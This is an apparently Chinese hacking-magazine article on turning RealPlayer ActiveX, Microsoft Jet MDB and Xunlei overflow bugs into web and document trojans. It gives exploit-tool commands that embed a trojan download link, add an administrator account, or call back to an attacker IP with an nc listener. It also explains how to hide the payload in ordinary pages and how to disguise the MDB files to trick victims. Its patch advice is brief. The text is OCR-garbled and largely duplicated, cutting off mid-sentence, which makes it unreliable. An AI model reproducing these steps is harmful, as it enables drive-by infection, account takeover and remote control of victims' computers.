论文部分内容阅读
最近网上木马攻击事件非常频繁,几款最常见的应用软件,如迅雷5、Realplay11,以及微软的MDB数据库,最近都暴出了溢出漏洞。利用这三个漏洞,可以制作出恐怖的溢出木马。新一轮的网页木马与特殊木马攻击事件正在发生着。让我们来看看攻击者是如何利用这三个漏洞,让上网者统统中招的!
“苍龙”——Realplay AetiveX网马
漏洞简述
最新暴出的“RealPlayer ActiveX控件播放列表名称栈溢出漏洞”,存在于RealPlayer11 beta及以下的版本中,只要在网页中添加上溢出漏洞触发代码,就可以制作出攻击威力非常大的网页木马。
漏洞网页木马制作
我们可以利用现成的漏洞溢出利用工具,制作RealPIayer溢出网页木马。
首先,我们应该制作一个木马程序。并上传到某个网站空间中去。这里假设我们上传了一个灰鸽子木马。其链接地址为“http://WWW.binghexijian.com/mumaexe”。然后下载并解压溢出利用工具,打开命令提示符窗口,进入溢出利用工具所在的文件夹,执行命令“realplay ActiveX 0day,exe”。可看到工具利用格式为:
realplay_ActiveX_C)day,exe[htmlfile]
其中参数表示要下载执行的木马链接地址,是必须指定的;[htmlfile]参数代表要生成的网页木马文件名,可以不必指定,如果不指定的话,默认为“realplay_071122_exp.html”。我们执行如下命令生成网页木马文件:
realplay_ActiveX_Oday.exe http://www.binghexijian.com/muma.exe muma html
命令执行后。在当前文件夹下生成一个名为“muma.html”的网页木马文件。将此网页文件上传到网站空间中,诱骗上网者浏览,如果对方的电脑上安装了有漏洞的RealPlayer。就会下载并运行我们指定的木马了。
网页木马的利用
如果打开刚才生成的网页木马,将会发现网页中显示为空白,为了让网页木马的执行传播更加隐蔽。可以通过其它方式将溢出代码加载运行。我们可用记事本打开“muma.html”文件。复制所有内容,将其添加到任意网页的源代码中,即可在不影响原网页的情况下,悄悄执行网页木马。此外,也可以将“muma.html”文件改名为.is文件,通过网页进行加载,这样更加隐蔽,具体的方法这里就不多说明了。
防范Realplay ActiveX溢出网马
Real公司已经发布了此漏洞的补丁,使用Real Player播放器的用户需要赶快升级。需要注意的是,如果使用的是老版本的RealOne Player、RealOnePlayer v2,或者RealPlayer 10,首先应该升级到RealPlayer 10.5,然后在使用安全更新。也可以直接下载安装Realplay 11正式版程序。不过许多用户可能都不太喜欢新版本庞大的体积和界面,可以使用一个最简单的方法网页木马——禁用Realplay ActiveX漏洞插件的运行。
“白虎”——MDB数据库木马
玩黑的朋友,对于MDB数据库文件绝对不陌生。各种网站程序离不开MDB数据库,日常办公中也常用MDB数据库文件,然而微软最近也暴出了一个MDB溢出漏洞(Microsoft Jet Engine MDB File Parsing StackOverfIOW Vulnerability for xp 2k3),导致使用Office软件的用户打开恶意MDB文件时,会遭受木马攻击。
从网上下载MDB溢出漏洞利用工具,解压后在命令行下进入工具文件夹,执行命令“mdb_r exp exe”。显示溢出工具运行格式。可以看到此漏洞有三种攻击利用方式,包括远程执行命令、下载执行木马和反向连接获得shell。下面将三种利用方式,分别进行讲解。
远程执行命令的MDB文件
利用MDB溢出漏洞,我们可以在MDB文件中添加攻击性的代码,让漏洞系统用户在打开文件时自动执行我们指定的命令,比如添加管理员用户名、打开33892端口等,以方便远程攻击或入侵控制等。这里以在远程漏洞主机上修改管理员用户密码为例,可在命令行下执行如下命令:
mdb_r_exp CXC00”net user administrator 000/add”
参数中,第一个0表示攻击Windows XP系统,如果要想攻击Windows 2000或2003系统,则可改为1;第二个0是用于指定攻击方式为远程执行命令的;双引号中的内容是要执行的单条命令,这里的命令表示修改管理员密码为“000”。命令执行后,提示“.MDB file created!”,在当前文件夹下会生成一个名为“009.mdb”的MDB数据库文件,可将其改名为其它伪装文件,如“dvbbs7.mdb”等。将文件发送给其它用户,或通过其它方式诈骗用户下载运行,如果对方系统中存在此漏洞,即会在打开文件时自动修改管理员用户密码了。
打造MDB木马
使用远程执行命令方式进行攻击的MDB文件。其应用还是有很大的局限性,因此我们可以在MDB文件中进行木马攻击。方法也很简单,执行如下命令:
mdb_r_exp.exe01http://www binghexijian.com/muma.exe
其中的参数1,表示使用远程下载运行的攻击方式。执行此命令后,则会生成一个MDB木马。当别人打开此MDB文件时,如果系统中存在漏洞,则会自动下载我们指定链接的木马文件,并在后台悄悄执行!
反弹Shell
如果对付某个已知的攻击目标,那么可以考虑让对方反弹连接到本机上来,以突破防火墙与杀毒软件等的限制。可在命令行下执行如下命令:
mdb_r_exp.exe02192.168.1.980
其中的“192.168.1.8”是本机的IP地址,如果是在Internet上进行攻击的话,则需要有一个公网的IP地址:“80”是反弹连接的端口。命令执行后生成MDB溢出文件。然后在本地使用NC工具监听指定的端口,例如这里可使用“nc—I-p 80”命令,执行后即可开始监听本地的80端口。将MDB文件发送给对方后,如果对方打开文件遭受溢出攻击,那么监听窗口中将会反弹连接获得一个Shell窗口。在此窗口中将可对远程主机进行任意操作,于在本地命令窗口中进行操作没有什么两样。
“朱雀”——迅雷溢出网页木马
迅雷更新换代非常频繁,往往有许多用户跟不上软件升级的步伐,而迅雷的溢出漏洞也一直不断的爆出,这给我们进行攻击留下了绝好的机会。迅雷Thunder5.7.4.401版本依然受到一个溢出漏洞的影响,导致我们可以制作溢出型的网页木马,轻松进行挂马攻击。
制作最新迅雷网页木马的方法与前面介绍的差不多,下载溢出利用工具。其命令格式为:“xunlei.0day exe木马链接地址网页木马文件名”。执行命令后,即可生成网页木马文件。用记事本打开后,复制所有代码,插入到其它正常的网页中后,即可实现挂马攻击了。
“苍龙”——Realplay AetiveX网马
漏洞简述
最新暴出的“RealPlayer ActiveX控件播放列表名称栈溢出漏洞”,存在于RealPlayer11 beta及以下的版本中,只要在网页中添加上溢出漏洞触发代码,就可以制作出攻击威力非常大的网页木马。
漏洞网页木马制作
我们可以利用现成的漏洞溢出利用工具,制作RealPIayer溢出网页木马。
首先,我们应该制作一个木马程序。并上传到某个网站空间中去。这里假设我们上传了一个灰鸽子木马。其链接地址为“http://WWW.binghexijian.com/mumaexe”。然后下载并解压溢出利用工具,打开命令提示符窗口,进入溢出利用工具所在的文件夹,执行命令“realplay ActiveX 0day,exe”。可看到工具利用格式为:
realplay_ActiveX_C)day,exe
其中
realplay_ActiveX_Oday.exe http://www.binghexijian.com/muma.exe muma html
命令执行后。在当前文件夹下生成一个名为“muma.html”的网页木马文件。将此网页文件上传到网站空间中,诱骗上网者浏览,如果对方的电脑上安装了有漏洞的RealPlayer。就会下载并运行我们指定的木马了。
网页木马的利用
如果打开刚才生成的网页木马,将会发现网页中显示为空白,为了让网页木马的执行传播更加隐蔽。可以通过其它方式将溢出代码加载运行。我们可用记事本打开“muma.html”文件。复制所有内容,将其添加到任意网页的源代码中,即可在不影响原网页的情况下,悄悄执行网页木马。此外,也可以将“muma.html”文件改名为.is文件,通过网页进行加载,这样更加隐蔽,具体的方法这里就不多说明了。
防范Realplay ActiveX溢出网马
Real公司已经发布了此漏洞的补丁,使用Real Player播放器的用户需要赶快升级。需要注意的是,如果使用的是老版本的RealOne Player、RealOnePlayer v2,或者RealPlayer 10,首先应该升级到RealPlayer 10.5,然后在使用安全更新。也可以直接下载安装Realplay 11正式版程序。不过许多用户可能都不太喜欢新版本庞大的体积和界面,可以使用一个最简单的方法网页木马——禁用Realplay ActiveX漏洞插件的运行。
“白虎”——MDB数据库木马
玩黑的朋友,对于MDB数据库文件绝对不陌生。各种网站程序离不开MDB数据库,日常办公中也常用MDB数据库文件,然而微软最近也暴出了一个MDB溢出漏洞(Microsoft Jet Engine MDB File Parsing StackOverfIOW Vulnerability for xp 2k3),导致使用Office软件的用户打开恶意MDB文件时,会遭受木马攻击。
从网上下载MDB溢出漏洞利用工具,解压后在命令行下进入工具文件夹,执行命令“mdb_r exp exe”。显示溢出工具运行格式。可以看到此漏洞有三种攻击利用方式,包括远程执行命令、下载执行木马和反向连接获得shell。下面将三种利用方式,分别进行讲解。
远程执行命令的MDB文件
利用MDB溢出漏洞,我们可以在MDB文件中添加攻击性的代码,让漏洞系统用户在打开文件时自动执行我们指定的命令,比如添加管理员用户名、打开33892端口等,以方便远程攻击或入侵控制等。这里以在远程漏洞主机上修改管理员用户密码为例,可在命令行下执行如下命令:
mdb_r_exp CXC00”net user administrator 000/add”
参数中,第一个0表示攻击Windows XP系统,如果要想攻击Windows 2000或2003系统,则可改为1;第二个0是用于指定攻击方式为远程执行命令的;双引号中的内容是要执行的单条命令,这里的命令表示修改管理员密码为“000”。命令执行后,提示“.MDB file created!”,在当前文件夹下会生成一个名为“009.mdb”的MDB数据库文件,可将其改名为其它伪装文件,如“dvbbs7.mdb”等。将文件发送给其它用户,或通过其它方式诈骗用户下载运行,如果对方系统中存在此漏洞,即会在打开文件时自动修改管理员用户密码了。
打造MDB木马
使用远程执行命令方式进行攻击的MDB文件。其应用还是有很大的局限性,因此我们可以在MDB文件中进行木马攻击。方法也很简单,执行如下命令:
mdb_r_exp.exe01http://www binghexijian.com/muma.exe
其中的参数1,表示使用远程下载运行的攻击方式。执行此命令后,则会生成一个MDB木马。当别人打开此MDB文件时,如果系统中存在漏洞,则会自动下载我们指定链接的木马文件,并在后台悄悄执行!
反弹Shell
如果对付某个已知的攻击目标,那么可以考虑让对方反弹连接到本机上来,以突破防火墙与杀毒软件等的限制。可在命令行下执行如下命令:
mdb_r_exp.exe02192.168.1.980
其中的“192.168.1.8”是本机的IP地址,如果是在Internet上进行攻击的话,则需要有一个公网的IP地址:“80”是反弹连接的端口。命令执行后生成MDB溢出文件。然后在本地使用NC工具监听指定的端口,例如这里可使用“nc—I-p 80”命令,执行后即可开始监听本地的80端口。将MDB文件发送给对方后,如果对方打开文件遭受溢出攻击,那么监听窗口中将会反弹连接获得一个Shell窗口。在此窗口中将可对远程主机进行任意操作,于在本地命令窗口中进行操作没有什么两样。
“朱雀”——迅雷溢出网页木马
迅雷更新换代非常频繁,往往有许多用户跟不上软件升级的步伐,而迅雷的溢出漏洞也一直不断的爆出,这给我们进行攻击留下了绝好的机会。迅雷Thunder5.7.4.401版本依然受到一个溢出漏洞的影响,导致我们可以制作溢出型的网页木马,轻松进行挂马攻击。
制作最新迅雷网页木马的方法与前面介绍的差不多,下载溢出利用工具。其命令格式为:“xunlei.0day exe木马链接地址网页木马文件名”。执行命令后,即可生成网页木马文件。用记事本打开后,复制所有代码,插入到其它正常的网页中后,即可实现挂马攻击了。